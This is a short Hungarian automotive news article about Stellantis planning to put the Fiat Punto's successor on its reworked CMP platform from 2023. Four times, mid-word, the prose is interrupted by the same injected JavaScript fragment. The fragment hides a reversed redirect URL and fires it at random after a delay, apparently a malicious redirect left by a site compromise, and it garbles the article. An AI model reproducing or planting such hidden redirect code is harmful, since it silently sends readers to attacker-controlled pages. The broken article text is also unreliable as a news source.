A Fiat-Chrysler és a PSA fúziójából létrejött Stellantis gyártóóriás igyekszik minden lehetséges téren megtalálni és megteremteni a szinergiákat a hatalmas cégcsoportoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton belül. Ennek fontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos része, hogy a márkák a lehető legnagyobb számban alkalmazzanak olyan, közös padlólemezeket, mint például a Peugeot 208, Citroën C4, Opel Corsa alapját adó CMP platform. Egy friss bejelentés szerint ehhez a trióhoz fog csatlakozni a Fiat Puntoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to utódja, ám csak 2023-tól, miután a Stellantis alaposan átdolgozta a CMP architektúrát. Ezen a pontoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton a Fiat B-szegmensbeli újdonsága elsőként kapja majd meg a platformot. A hír önmagában is örvendetes, hiszen miután a Fiat 2018-ban nyugdíjazta az akkor már tizenhárom éves, menthetetlenül elavult Puntót, nincs…
- Hirdetés -